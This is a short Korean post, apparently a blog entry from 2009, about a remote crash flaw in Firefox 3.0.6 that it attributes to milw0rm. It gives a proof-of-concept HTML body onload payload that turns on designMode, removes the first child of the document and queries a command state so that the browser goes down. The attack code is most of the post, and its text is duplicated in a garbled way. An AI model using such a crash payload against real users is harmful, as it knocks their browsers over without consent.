Mozilla Firefox 3.0.6 (BODY onload) Remote Crash Exploit
2009. 2. 24. 07:59
※ 참조 SITE : http://www.milw0rm.com/exploits/8091
FireFox 3.0.6 버전에서 브라우저를 Crash 가능한 취약점이 발견되었다.
○ PoC
onload 이벤트에서 취약점이 발생하여 브라우져가 다운된다.
onload 이벤트에서 취약점이 발생하여 브라우져가 다운된다.
<BODY onload="
document.designMode='on';//string
document.removeChild(document.firstChild);//object
document.queryCommandState('BackColor');
">
document.designMode='on';//string
document.removeChild(document.firstChild);//object
document.queryCommandState('BackColor');
">